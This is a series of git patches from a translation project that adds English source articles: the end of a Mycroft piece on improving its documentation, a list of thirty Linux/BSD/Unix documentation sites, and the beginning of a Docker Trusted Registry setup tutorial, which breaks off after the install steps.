+[Please do take a moment and have a read through our new documentation][20]. We know it isn't perfect--far from it--but we're confident that the mechanisms we've baked into our new documentation infrastructure will make it easier to identify gaps--and resolve them quickly. If you'd like to know more, or have suggestions for our documentation, please reach out to Kathy Reid on [Chat][21] (@kathy-mycroft) or via [email][22].
+
+_Reprinted with permission from[Mycroft.ai][23]._
+
+### About the author
+Kathy Reid - Director of Developer Relations @MycroftAI, President of @linuxaustralia. Kathy Reid has expertise in open source technology management, web development, video conferencing, digital signage, technical communities and documentation. She has worked in a number of technical and leadership roles over the last 20 years, and holds Arts and Science undergraduate degrees...
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/18/1/rocking-docs-mycroft
+
+作者:[Kathy Reid][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/kathyreid
+[1]:https://opensource.com/users/aneta
+[2]:https://opensource.com/article/17/10/doc-audits
+[3]:/file/382466
+[4]:https://opensource.com/sites/default/files/images/life-uploads/mycroft-documentation-audit.png (mycroft documentation audit)
+[5]:https://git-scm.com/
+[6]:https://github.com/MycroftAI
+[7]:https://en.wikipedia.org/wiki/Markdown
+[8]:https://www.wordpress.org/
+[9]:https://github.com/
+[10]:https://github.com/mycroftai
+[11]:http://mycroft.ai/team/
+[12]:https://wordpress.org/plugins/parsedown-party/
+[13]:https://developer.wordpress.org/themes/template-files-section/page-template-files/
+[14]:https://marketingland.com/estimated-reading-times-increase-engagement-79830
+[15]:https://jasonyingling.me/reading-time-wp/
+[16]:https://multiratingpro.com/
+[17]:https://github.com/MycroftAI/docs-rewrite/blob/master/README.md
+[18]:https://wordpress.org/plugins/wp-anchor-header/
+[19]:https://github.com/jonschlinkert/markdown-toc
+[20]:https://mycroft.ai/documentation
+[21]:https://chat.mycroft.ai/
+[22]:mailto:kathy.reid@mycroft.ai
+[23]:https://mycroft.ai/blog/improving-mycrofts-documentation/
From c17a03f1a00d9b10f5d3df67ad3da2cb39c4bf50 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 18:31:16 +0800
Subject: [PATCH 244/371] add done: 20180109 How Mycroft used WordPress and
GitHub to improve its documentation.md
---
...roft used WordPress and GitHub to improve its documentation.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename sources/{tech => talk}/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md (100%)
diff --git a/sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md b/sources/talk/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
similarity index 100%
rename from sources/tech/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
rename to sources/talk/20180109 How Mycroft used WordPress and GitHub to improve its documentation.md
From ccc5de4f003c09954f94baf4ff08971d7f96f060 Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 18:40:41 +0800
Subject: [PATCH 245/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2030=20Best=20Sourc?=
=?UTF-8?q?es=20For=20Linux=20/=20*BSD=20/=20Unix=20Documentation=20On=20t?=
=?UTF-8?q?he=20Web?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... - -BSD - Unix Documentation On the Web.md | 458 ++++++++++++++++++
1 file changed, 458 insertions(+)
create mode 100644 sources/tech/20111221 30 Best Sources For Linux - -BSD - Unix Documentation On the Web.md
diff --git a/sources/tech/20111221 30 Best Sources For Linux - -BSD - Unix Documentation On the Web.md b/sources/tech/20111221 30 Best Sources For Linux - -BSD - Unix Documentation On the Web.md
new file mode 100644
index 0000000000..ac35f7c596
--- /dev/null
+++ b/sources/tech/20111221 30 Best Sources For Linux - -BSD - Unix Documentation On the Web.md
@@ -0,0 +1,458 @@
+30 Best Sources For Linux / *BSD / Unix Documentation On the Web
+======
+Man pages are written by sysadmins and developers for IT techs, and are intended more as a reference than as a how-to. Man pages are very useful for people who are already familiar with Linux, Unix, and BSD operating systems. Use man pages when you just need to know the syntax for a particular command or configuration file, but they are not helpful for new Linux users, and they are not good for learning something new for the first time. Here are the thirty best documentation sites on the web for learning Linux and Unix-like operating systems.
+
+![Dennis Ritchie and Ken Thompson working with UNIX PDP11][1]
+
+Please note that BSD manpages are usually better compared to Linux ones.
+
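+A couple of hedged examples (not part of the original list) of the kind of quick lookup that man pages are good for:
+
+```
+# syntax reference for a configuration file
+man 5 fstab
+# search man page descriptions for a keyword (same as apropos)
+man -k compress
+```
+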
+## #1: Red Hat Enterprise Linux
+
+![Red hat Enterprise Linux Docs][2]
+
+RHEL is developed by Red Hat and targeted toward the commercial market. It has some of the best documentation, covering everything from the basics of RHEL to advanced topics like security, SELinux, virtualization, directory server, clustering, JBOSS, HPC, and much more. Red Hat documentation has been translated into twenty-two languages and is available in multi-page HTML, single-page HTML, PDF, and EPUB formats. The good news is you can use the same documentation for CentOS or Scientific Linux (community enterprise distros). All of these documents ship with the OS, so if you don't have a network connection, then you have them there as well. The RHEL docs **cover everything from installation to configuring clusters**. The only downside is you need to be a paid customer. This is perfect for an enterprise company.
+
+ 1. RHEL Documentation: [in HTML/PDF format][3]
+ 2. Support forums: Only available to Red Hat customer portal to submit a support case.
+
+
+
+### A Note About CentOS Wiki and Forums
+
+![Centos Linux Wiki][4]
+
+CentOS (Community ENTerprise Operating System) is a free rebuild of the source packages freely available from RHEL. It provides a truly reliable, free enterprise Linux for personal and other usage. You get RHEL stability without the cost of certification and support. The CentOS wiki is divided into Howtos, Tips & Tricks, and much more, at the following locations:
+
+ 1. [Documentation Wiki][87]
+ 2. [Support forum][88]
+
+## #2: Arch Wiki and Forums
+
+![Arch Linux wiki and tutorials][5]
+
+Arch Linux is an independently developed Linux operating system, and it comes with pretty good documentation in the form of a wiki-based site. It is developed collaboratively by a community of Arch users, allowing any user to add and edit content. The articles are divided into various categories like [networking][6], optimization, package management, system administration, the X window system, and getting & installing Arch Linux. The official [forums][7] are useful for solving many issues; they have 40k+ registered users with over 1 million posts. The wiki contains some **general information that also applies to other Linux distros**.
+
+ 1. Arch community Documentation: [Wiki format][8]
+ 2. Support forums: [Yes][7]
+
+
+
+## #3: Gentoo Linux Wiki and Forums
+
+![Gentoo Linux Handbook and Wiki][9]
+
+Gentoo Linux is based on the Portage package management system. Gentoo users compile the source code locally according to their chosen configuration. The majority of users have configurations and sets of installed programs which are unique to themselves. The Gentoo handbook and wiki give you a good explanation of Gentoo Linux and answer most of your questions regarding installation, packages, networking, and much more. Gentoo has a **very helpful forum** with over one hundred thirty-four thousand users who have posted a total of 5,442,416 articles.
+
+ 1. Gentoo community documentation: [Handbook][10] and [Wiki format][11]
+ 2. Support forums: [Yes][12]
+ 3. User-supplied documentation available at [gentoo-wiki.com][13]
+
+
+
+## #4: Ubuntu Wiki and Documentation
+
+Ubuntu is one of the leading desktop and laptop distros. The official documentation is developed and maintained by the Ubuntu Documentation Project. You can access a wealth of information, including a getting started guide. The best part is that the information contained herein may also work with other Debian-based systems. You will also find the community documentation for Ubuntu, created by its users. This is a reference for Ubuntu-related 'Howtos, Tips, Tricks, and Hacks'. Ubuntu Linux has one of the biggest Linux communities on the web. It offers help to both new and experienced users.
+
+![Ubuntu Linux Wiki and Forums][14]
+
+ 1. Ubuntu community documentation: [wiki format][15].
+ 2. Ubuntu official documentation: [wiki format][16].
+ 3. Support forums: [Yes][17].
+
+
+
+## #5: IBM Developer Works
+
+IBM developer works offers technical resources for Linux programmers and system administrators. It contains hundreds of articles, tutorials, and tips to help developers with Linux programming and application development, as well as Linux system administration.
+
+![IBM: Technical for Linux programmers and system administrators][18]
+
+ 1. IBM Developer Works Documentation: [HTML format][19]
+ 2. Support forums: [Yes][20].
+
+
+
+## #6: FreeBSD Documentation and Handbook
+
+The FreeBSD Handbook is created by the FreeBSD Documentation Project. It describes the installation, administration, and day-to-day use of the FreeBSD OS. BSD manpages are usually better compared to GNU/Linux man pages. FreeBSD **comes with all the documents** and up-to-date man pages. The FreeBSD Handbook **covers everything**. The handbook contains some general Unix information that also applies to other Linux distros. The official FreeBSD forums also provide help whenever you get stuck with problems.
+
+![Freebsd Documentation][21]
+
+ 1. FreeBSD Documentation: [HTML/PDF format][90]
+ 2. Support forums: [Yes][91].
+
+
+## #7: Bash Hackers Wiki
+
+![Bash hackers wiki for bash users][22]
+This is an excellent resource for bash users. The bash hackers wiki is intended to hold documentation of any kind about GNU Bash. The main motivation was to provide human-readable documentation and information so users are not forced to read every bit of the Bash manpage - which is hard sometimes. The wiki is divided into various sections such as scripting and general information, howtos, coding style, bash syntax, and much more.
+
+ 1. Bash hackers [wiki][23] in wiki format
+
+
+
+## #8: Bash FAQ
+
+![Bash FAQ: Answers to frequently asked questions about GNU/BASH][24]
+A wiki designed for new bash users. It has a good collection of answers to frequently asked questions from the #bash channel on the freenode IRC network. These answers are contributed by the regular members of the channel. Don't forget to check out common mistakes made by Bash programmers in the [BashPitfalls][25] section. The answers given in this FAQ may be slanted toward Bash, or they may be slanted toward the lowest common denominator Bourne shell, depending on who wrote the answer. In most cases, an effort is made to provide both a portable (Bourne) and an efficient (Bash, where appropriate) answer.
+
+ 1. Bash FAQ [in wiki ][26] format.
+
+
+
+## #9: Howtoforge - Linux Tutorials
+
+![Howtoforge][27]
+
+Fellow blogger Falko has some great stuff over at How-To Forge. The site provides Linux tutorials on various topics, including its famous "The Perfect Server" series. The site is divided into various topics such as web servers, Linux distros, DNS servers, virtualization, high availability, email and anti-spam, FTP servers, programming topics, and much more. The site is also available in German.
+
+ 1. Howtoforge [in html][28] format.
+ 2. Support forums: Yes
+
+
+
+## #10: OpenBSD FAQ and Documentation
+
+![OpenBSD Documenation][29]
+
+OpenBSD is another Unix-like computer operating system based on the Berkeley Software Distribution (BSD). It was forked from NetBSD. OpenBSD is well known for its **quality code and documentation**, uncompromising position on software licensing, and strong focus on security. The documentation is divided into various topics such as installation, package management, firewall setup, user management, networking, disk / RAID management, and much more.
+
+ 1. OpenBSD [in html][30] format.
+ 2. Support forums: No, but [mail lists][31] are available.
+
+
+
+## #11: Calomel - Open Source Research and Reference
+
+This amazing site is dedicated to documenting open source software and programs, with a special focus on OpenBSD. It is one of the cleanest and easiest-to-navigate websites, with a focus on quality content. The site is divided into various server topics such as DNS, OpenBSD, security, web servers, the Samba file server, various tools, and much more.
+
+![Open Source Research and Reference Documentation][32]
+
+ 1. Calomel Org [in html][33] format.
+ 2. Support forums: No
+
+
+
+## #12: Slackware Book Project
+
+![Slackware Linux Book and Documentation ][34]
+Slackware Linux was my first distro. It was one of the earliest distros based on the Linux kernel and is the oldest currently being maintained. The distro is targeted towards power users with a strong focus on stability. Slackware is one of the most "Unix-like" Linux distributions. The official Slackware book is designed to get you started with the Slackware Linux operating system. It's not meant to cover every single aspect of the distribution, but rather to show what it is capable of and give you a basic working knowledge of the system. The book is divided into various topics such as installation, network & system configuration, system administration, package management, and much more.
+
+ 1. Slackware [Linux books in html][35], pdf, and other format.
+ 2. Support forums: Yes
+
+
+
+## #13: The Linux Documentation Project (TLDP)
+
+![Linux Learning Site and Documentation ][36]
+
+The Linux Documentation Project is working towards developing free, high quality documentation for the Linux operating system. The site is created and maintained by volunteers. The site is divided into subject-specific help, longer and in-depth guide books, and much more. I recommend [this document][37] which is both a tutorial and a reference on shell scripting with Bash. The [single list][38] of HOWTOs is also a good starting point for new users.
+
+ 1. The Linux [documentation project][39] available in multiple formats.
+ 2. Support forums: No
+
+
+
+## #14: Linux Home Networking
+
+![Linux Home Networking ][40]
+
+Linux home networking is another good resource for learning Linux. This site covers topics needed for Linux software certification exams, such as the RHCE, and many computer training courses. The site is divided into various topics such as networking, the Samba file server, wireless networking, web servers, and much more.
+
+ 1. Linux [home networking][41] available in html and PDF (with small fee) formats.
+ 2. Support forums: Yes
+
+
+
+## #15: Linux Action Show
+
+![Linux Podcast ][42]
+
+Linux Action Show ("LAS") is a podcast about Linux. The show is hosted by Bryan Lunduke, Allan Jude, and Chris Fisher. It covers the latest news in the FOSS world. The show reviews various apps and Linux distros. Sometimes an interview with a major personality in the open source world is posted on the show.
+
+ 1. Linux [action show][43] available in audio/video format.
+ 2. Support forums: Yes
+
+
+
+## #16: Commandlinefu
+
+Commandlinefu lists various shell commands that you may find interesting and useful. All commands can be commented on, discussed, and voted up or down. This is an awesome resource for all Unix command line users. Don't forget to check out all the [top voted][44] commands here.
+
+![The best Unix / Linux Commands By Commandlinefu][45]
+
+ 1. [Commandlinefu][46] available in html format.
+ 2. Support forums: No
+
+
+
+## #17: Debian Administration Tips and Resources
+
+This site covers topics, tips, and tutorials related only to Debian GNU/Linux. It contains interesting and useful information related to system administration. You can contribute an article, tip, or question here. Don't forget to check out the [top articles][47] posted in the hall of fame section.
+![Debian Linux Adminstration: Tips and Tutorial For Sys Admin][48]
+
+ 1. Debian [administration][49] available in html format.
+ 2. Support forums: No
+
+
+
+## #18: Catonmat - Sed, Awk, Perl Tutorials
+
+![Sed, Awk, Perl Tutorials][50]
+
+This site is run by fellow blogger Peteris Krumins. The main focus is on command line and Unix programming topics such as sed, perl, awk, and others. Don't forget to check out the [introduction to sed][51], sed [one-liners][52] explained, the definitive [guide][53] to Bash command-line history, and [awk][54] one-liners explained.
+
+ 1. [catonmat][55] available in html format.
+ 2. Support forums: No
+
+
+
+## #19: Debian GNU/Linux Documentation and Wiki
+
+![Debian Linux Tutorials and Wiki][56]
+
+Debian is another Linux-based operating system that primarily uses software released under the GNU General Public License. Debian is well known for its strict adherence to the philosophies of Unix and free software. It is also one of the most popular and influential Linux distributions, and it is used as a base for many other distributions such as Ubuntu. The Debian project provides its users with proper documentation in an easily accessible form. The site is divided into a wiki, installation guide, FAQs, and support forum.
+
+ 1. Debian GNU/Linux [documentation][57] available in html and other format.
+ 2. Debian GNU/Linux [wiki][58]
+ 3. Support forums: [Yes][59]
+
+
+
+## #20: Linux Sea
+
+The book "Linux Sea" offers a gentle yet technical (from end-user perspective) introduction to the Linux operating system, using Gentoo Linux as the example Linux distribution. It does not nor will it ever talk about the history of the Linux kernel or Linux distributions or dive into details that are less interesting for Linux users.
+
+ 1. Linux [sea][60] available in html format.
+ 2. Support forums: No
+
+
+
+## #21: Oreilly Commons
+
+![Oreilly Free Linux / Unix / Php / Javascript / Ubuntu Books][61]
+
+The O'Reilly publishing house has posted quite a few titles in wiki format for all. The purpose of this site is to provide content to communities that would like to create, reference, use, modify, update and revise material from O'Reilly or other sources. The site includes books about Ubuntu, PHP, SpamAssassin, Linux, and much more, all for free.
+
+ 1. Oreilly [commons][62] available in wiki format.
+ 2. Support forums: No
+
+
+
+## #22: Ubuntu Pocket Guide
+
+![Ubuntu Book For New Users][63]
+
+This book is written by Keir Thomas. This guide/book is a good read for the everyday Ubuntu user. The purpose of this book is to introduce you to the Ubuntu operating system, and the philosophy that underpins it. You can download a PDF version from the official site or order a print version on Amazon.
+
+ 1. Ubuntu [pocket guide][64] available in pdf and print formats.
+ 2. Support forums: No
+
+
+
+## #23: Linux: Rute User's Tutorial and Exposition
+
+![GNU/LINUX system administration book][65]
+
+This book covers GNU/LINUX system administration, for popular distributions like RedHat and Debian, as a tutorial for new users and a reference for advanced administrators. It aims to give concise, thorough explanations and practical examples of each aspect of a UNIX system. Anyone who wants a comprehensive text on (what is commercially called) LINUX need look no further-there is little that is not covered here.
+
+ 1. Linux: [Rute User's Tutorial and Exposition][66] available in print and html formats.
+ 2. Support forums: No
+
+
+
+## #24: Advanced Linux Programming
+
+![Advanced Linux Programming][67]
+
+This book is intended for the programmer already familiar with the C programming language. It takes a tutorial approach and teaches the most important concepts and power features of the GNU/Linux system in application programs. If you're a developer already experienced with programming for the GNU/Linux system, are experienced with another UNIX-like system and are interested in developing GNU/Linux software, or want to make the transition from a non-UNIX environment and are already familiar with the general principles of writing good software, this book is for you. In addition, you will find that this book is equally applicable to C and C++ programming.
+
+ 1. Advanced [Linux programming][68] available in print and pdf formats.
+ 2. Support forums: No
+
+
+
+## #25: LPI 101 Course Notes
+
+![Linux Professional Institute Certification Books][69]
+
+LPIC-1/2/3 levels are certifications for Linux administrators. This site provides training manuals for the LPI 101 and 102 exams. These are licensed under the GNU Free Documentation Licence (FDL). The course material is based on the objectives of the Linux Professional Institute's LPI 101 and 102 examinations. The course is intended to provide you with the skills required for operating and administering Linux systems.
+
+ 1. Download LPI [training manuals][70] in pdf format.
+ 2. Support forums: No
+
+
+
+## #26: FOSS Manuals
+
+FLOSS Manuals is a collection of manuals about free and open source software, together with the tools used to create them and the community that uses those tools. They include authors, editors, artists, software developers, activists, and many others. There are manuals that explain how to install and use a range of free and open source software, manuals about how to do things (like design or stay safe online) with open source software, and manuals about free culture services that use or support free software and formats. You will find manuals about software such as VLC, [Linux video editing][71], Linux, OLPC / SUGAR, GRAPHICS, and much more.
+
+![FLOSS Manuals is a collection of manuals about free and open source software][72]
+
+ 1. You can browse [FOSS manuals][73] in wiki format.
+ 2. Support forums: No
+
+
+
+## #27: Linux Starter Pack
+
+![The Linux Starter Pack][74]
+
+New to the wonderful world of Linux? Looking for an easy way to get started? You can download this 130-page guide and get to grips with the OS. It will show you how to install Linux onto your PC, navigate around the desktop, master the most popular Linux programs, and fix any problems that may arise.
+
+ 1. Download [Linux starter][75] pack in pdf format.
+ 2. Support forums: No
+
+
+
+## #28: Linux.com - The Source of Linux Info
+
+Linux.com is a product of the Linux Foundation. The site provides news, guides, tutorials and other information about Linux by harnessing the power of Linux users worldwide to inform, collaborate and connect on all matters Linux.
+
+ 1. Visit [Linux.com][76] online.
+ 2. Support forums: Yes
+
+
+
+## #29: LWN
+
+LWN is a site with an emphasis on free software and software for Linux and other Unix-like operating systems. It consists of a weekly issue, separate stories which are published most days, and threaded discussion attached to every story. The site provides comprehensive coverage of development, legal, commercial, and security issues related to Linux and FOSS.
+
+ 1. Visit [lwn.net][77] online.
+ 2. Support forums: No
+
+
+
+## #30: Mac OS X Related sites
+
+Quick links to Mac OS X related sites:
+
+ * [Mac OS X Hints][78] - This site is dedicated to Apple's Mac OS X Unix operating system. It has tons of tips, tricks and tutorials about Bash and OS X
+ * [Mac OS development library][79] - Apple has a good collection related to OS X development. Don't forget to check out the [bash shell scripting primer][80].
+ * [Apple kbase][81] - This is like the RHN kbase. It provides guides and troubleshooting tips for all Apple products including OS X.
+
+
+
+## #30: NetBSD
+
+NetBSD is another free open source operating system based upon the Berkeley Software Distribution (BSD) Unix operating system. The NetBSD project is primarily focused on high quality design, stability and performance of the system. Due to its portability and Berkeley-style license, NetBSD is often used in embedded systems. This site provides links to the official NetBSD documentation and also links to various external documents.
+
+ 1. View [netbsd][82] documentation online in html / pdf format.
+ 2. Support forums: No
+
+
+
+## Your Turn:
+
+This is my personal list and it is not absolutely definitive, so if you've got your own favorite Unix/Linux specific site, share in the comments below.
+
+// Image credit: [Flickr photo][83] by PanelSwitchman. Some links were suggested by users on our Facebook fan page.
+
+// For those who celebrate, Merry Christmas! For everyone else, enjoy the weekend.
+
+## About the author
+
+The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on [Twitter][84], [Facebook][85], [Google+][86].
+
+--------------------------------------------------------------------------------
+
+via: https://www.cyberciti.biz/tips/linux-unix-bsd-documentations.html
+
+作者:[Vivek Gite][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.cyberciti.biz
+[1]:https://www.cyberciti.biz/media/new/tips/2011/12/unix-pdp11.jpg (Dennis Ritchie and Ken Thompson working with UNIX PDP11)
+[2]:https://www.cyberciti.biz/media/new/tips/2011/12/redhat-enterprise-linux-docs-150x150.png (Red hat Enterprise Linux Docs)
+[3]:https://access.redhat.com/documentation/en-us/
+[4]:https://www.cyberciti.biz/media/new/tips/2011/12/centos-linux-wiki-150x150.png (Centos Linux Wiki, Support, Documents)
+[5]:https://www.cyberciti.biz/media/new/tips/2011/12/arch-linux-wiki-150x150.png (Arch Linux wiki and tutorials )
+[6]:https://wiki.archlinux.org/index.php/Category:Networking_%28English%29
+[7]:https://bbs.archlinux.org/
+[8]:https://wiki.archlinux.org/
+[9]:https://www.cyberciti.biz/media/new/tips/2011/12/gentoo-linux-wiki1-150x150.png (Gentoo Linux Handbook and Wiki)
+[10]:http://www.gentoo.org/doc/en/handbook/
+[11]:https://wiki.gentoo.org
+[12]:https://forums.gentoo.org/
+[13]:http://gentoo-wiki.com
+[14]:https://www.cyberciti.biz/media/new/tips/2011/12/ubuntu-linux-wiki.png (Ubuntu Linux Wiki and Forums)
+[15]:https://help.ubuntu.com/community
+[16]:https://help.ubuntu.com/
+[17]:https://ubuntuforums.org/
+[18]:https://www.cyberciti.biz/media/new/tips/2011/12/ibm-devel.png (IBM: Technical for Linux programmers and system administrators)
+[19]:https://www.ibm.com/developerworks/learn/linux/index.html
+[20]:https://www.ibm.com/developerworks/community/forums/html/public?lang=en
+[21]:https://www.cyberciti.biz/media/new/tips/2011/12/freebsd-docs.png (Freebsd Documentation)
+[22]:https://www.cyberciti.biz/media/new/tips/2011/12/bash-hackers-wiki-150x150.png (Bash hackers wiki for bash users)
+[23]:http://wiki.bash-hackers.org/doku.php
+[24]:https://www.cyberciti.biz/media/new/tips/2011/12/bash-faq-150x150.png (Bash FAQ: Answers to frequently asked questions about GNU/BASH)
+[25]:http://mywiki.wooledge.org/BashPitfalls
+[26]:https://mywiki.wooledge.org/BashFAQ
+[27]:https://www.cyberciti.biz/media/new/tips/2011/12/howtoforge-150x150.png (Howtoforge tutorials)
+[28]:https://howtoforge.com/
+[29]:https://www.cyberciti.biz/media/new/tips/2011/12/openbsd-faq-150x150.png (OpenBSD Documenation)
+[30]:https://www.openbsd.org/faq/index.html
+[31]:https://www.openbsd.org/mail.html
+[32]:https://www.cyberciti.biz/media/new/tips/2011/12/calomel_org.png (Open Source Research and Reference Documentation)
+[33]:https://calomel.org
+[34]:https://www.cyberciti.biz/media/new/tips/2011/12/slackware-linux-book-150x150.png (Slackware Linux Book and Documentation )
+[35]:http://www.slackbook.org/
+[36]:https://www.cyberciti.biz/media/new/tips/2011/12/tldp-150x150.png (Linux Learning Site and Documentation )
+[37]:http://tldp.org/LDP/abs/html/index.html
+[38]:http://tldp.org/HOWTO/HOWTO-INDEX/howtos.html
+[39]:http://tldp.org/
+[40]:https://www.cyberciti.biz/media/new/tips/2011/12/linuxhomenetworking-150x150.png (Linux Home Networking )
+[41]:http://www.linuxhomenetworking.com/
+[42]:https://www.cyberciti.biz/media/new/tips/2011/12/linux-action-show-150x150.png (Linux Podcast )
+[43]:http://www.jupiterbroadcasting.com/show/linuxactionshow/
+[44]:https://www.commandlinefu.com/commands/browse/sort-by-votes
+[45]:https://www.cyberciti.biz/media/new/tips/2011/12/commandlinefu.png (The best Unix / Linux Commands )
+[46]:https://commandlinefu.com/
+[47]:https://www.debian-administration.org/hof
+[48]:https://www.cyberciti.biz/media/new/tips/2011/12/debian-admin.png (Debian Linux Adminstration: Tips and Tutorial For Sys Admin)
+[49]:https://www.debian-administration.org/
+[50]:https://www.cyberciti.biz/media/new/tips/2011/12/catonmat-150x150.png (Sed, Awk, Perl Tutorials)
+[51]:http://www.catonmat.net/blog/worlds-best-introduction-to-sed/
+[52]:https://www.catonmat.net/blog/sed-one-liners-explained-part-one/
+[53]:https://www.catonmat.net/blog/the-definitive-guide-to-bash-command-line-history/
+[54]:https://www.catonmat.net/blog/awk-one-liners-explained-part-one/
+[55]:https://catonmat.net/
+[56]:https://www.cyberciti.biz/media/new/tips/2011/12/debian-wiki-150x150.png (Debian Linux Tutorials and Wiki)
+[57]:https://www.debian.org/doc/
+[58]:https://wiki.debian.org/
+[59]:https://www.debian.org/support
+[60]:http://swift.siphos.be/linux_sea/
+[61]:https://www.cyberciti.biz/media/new/tips/2011/12/orelly-150x150.png (Oreilly Free Linux / Unix / Php / Javascript / Ubuntu Books)
+[62]:http://commons.oreilly.com/wiki/index.php/O%27Reilly_Commons
+[63]:https://www.cyberciti.biz/media/new/tips/2011/12/ubuntu-guide-150x150.png (Ubuntu Book For New Users)
+[64]:http://ubuntupocketguide.com/
+[65]:https://www.cyberciti.biz/media/new/tips/2011/12/rute-150x150.png (GNU/LINUX system administration free book)
+[66]:https://web.archive.org/web/20160204213406/http://rute.2038bug.com/rute.html.gz
+[67]:https://www.cyberciti.biz/media/new/tips/2011/12/advanced-linux-programming-150x150.png (Download Advanced Linux Programming PDF version)
+[68]:https://github.com/MentorEmbedded/advancedlinuxprogramming
+[69]:https://www.cyberciti.biz/media/new/tips/2011/12/lpic-150x150.png (Download Linux Professional Institute Certification PDF Book)
+[70]:http://academy.delmar.edu/Courses/ITSC1358/eBooks/LPI-101.LinuxTrainingCourseNotes.pdf
+[71]://www.cyberciti.biz/faq/top5-linux-video-editing-system-software/
+[72]:https://www.cyberciti.biz/media/new/tips/2011/12/floss-manuals.png (Download manuals about free and open source software)
+[73]:https://flossmanuals.net/
+[74]:https://www.cyberciti.biz/media/new/tips/2011/12/linux-starter-150x150.png (New to Linux? Start Linux starter book [ PDF version ])
+[75]:http://www.tuxradar.com/linuxstarterpack
+[76]:https://linux.com
+[77]:https://lwn.net/
+[78]:http://hints.macworld.com/
+[79]:https://developer.apple.com/library/mac/navigation/
+[80]:https://developer.apple.com/library/mac/#documentation/OpenSource/Conceptual/ShellScripting/Introduction/Introduction.html
+[81]:https://support.apple.com/kb/index?page=search&locale=en_US&q=
+[82]:https://www.netbsd.org/docs/
+[83]:https://www.flickr.com/photos/9479603@N02/3311745151/in/set-72157614479572582/
+[84]:https://twitter.com/nixcraft
+[85]:https://facebook.com/nixcraft
+[86]:https://plus.google.com/+CybercitiBiz
+[87]:https://wiki.centos.org/
+[88]:https://www.centos.org/forums/
+[90]: https://www.freebsd.org/docs.html
+[91]: https://forums.freebsd.org/
From 325b2c5e68d6c35eaa480fc0f7f1a38d3ce5ffca Mon Sep 17 00:00:00 2001
From: darksun
Date: Thu, 11 Jan 2018 18:45:24 +0800
Subject: [PATCH 246/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Using=20Your=20Ow?=
=?UTF-8?q?n=20Private=20Registry=20with=20Docker=20Enterprise=20Edition?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...Registry with Docker Enterprise Edition.md | 126 ++++++++++++++++++
1 file changed, 126 insertions(+)
create mode 100644 sources/tech/20180110 Using Your Own Private Registry with Docker Enterprise Edition.md
diff --git a/sources/tech/20180110 Using Your Own Private Registry with Docker Enterprise Edition.md b/sources/tech/20180110 Using Your Own Private Registry with Docker Enterprise Edition.md
new file mode 100644
index 0000000000..88b1eb96e1
--- /dev/null
+++ b/sources/tech/20180110 Using Your Own Private Registry with Docker Enterprise Edition.md
@@ -0,0 +1,126 @@
+Using Your Own Private Registry with Docker Enterprise Edition
+======
+
+![docker trusted registry][1]
+
+One of the things that makes Docker really cool, particularly compared to using virtual machines, is how easy it is to move around Docker images. If you've already been using Docker, you've almost certainly pulled images from [Docker Hub][2]. Docker Hub is Docker's cloud-based registry service and has tens of thousands of Docker images to choose from. If you're developing your own software and creating your own Docker images though, you'll want your own private Docker registry. This is particularly true if you have images with proprietary licenses, or if you have a complex continuous integration (CI) process for your build system.
+
+Docker Enterprise Edition includes Docker Trusted Registry (DTR), a highly available registry with secure image management capabilities which was built to run either inside of your own data center or on your own cloud-based infrastructure. In the next few weeks, we'll go over how DTR is a critical component of delivering a secure, repeatable and consistent [software supply chain][3]. You can get started with it today through our [free hosted demo][4] or by downloading and installing the free 30-day trial. The steps to get started with your own installation are below.
+
+## Setting Up Docker Enterprise Edition
+
+Docker Trusted Registry runs on top of Universal Control Plane (UCP), so to begin let's install a single-node cluster. If you've already got your own UCP cluster, you can skip this step. On your docker host, run the command:
+
+```
+# Pull and install UCP
+
+docker run -it --rm -v /var/run/docker.sock:/var/run/docker.sock --name ucp docker/ucp:latest install
+```
+
+Once UCP is up and running, there are a few more things you should do before you install DTR. Open up your browser against the UCP instance you just installed. There should be a link to it at the end of your log output. If you already have a Docker Enterprise Edition license, go ahead and upload it through the UI. If you don't, visit the [Docker Store][5] and pick up a free, 30-day trial.
+
+Once you've got licensing squared away, you're probably going to want to change the port which UCP is running on. Since this is a single node cluster, DTR and UCP are going to want to use the same TCP ports for running their web services. If you've got a UCP swarm with more than one node, this probably isn't a problem because DTR will look for a node which has the required free ports. Inside of UCP, click on Admin Settings -> Cluster Configuration and change the Controller Port to something like 5443.
+
+## Installing DTR
+
+We're going to install a simple, single-node instance of Docker Trusted Registry. If you were setting up your DTR for production use, you would likely set things up in High Availability (HA) mode which would require a different type of storage such as a cloud-based object store, or NFS. Since this is a single-node instance, we're going to stick with the default local storage.
+
+First we need to pull the DTR bootstrap image. The bootstrap image is a tiny, self-contained installer which connects to UCP and sets up all of the containers, volumes, and logical networks required to get DTR up and running.
+
+Use the command:
+
+```
+# Pull and run the DTR bootstrapper
+
+docker run -it --rm docker/dtr:latest install --ucp-insecure-tls
+```
+
+NOTE: Both UCP and DTR by default come with their own certs, which won't be recognized by your system. If you've set up UCP with TLS certs which are trusted by your system, you can omit the `--ucp-insecure-tls` option. Alternatively, you can use the `--ucp-ca` option, which lets you specify the UCP CA certificate directly.
+
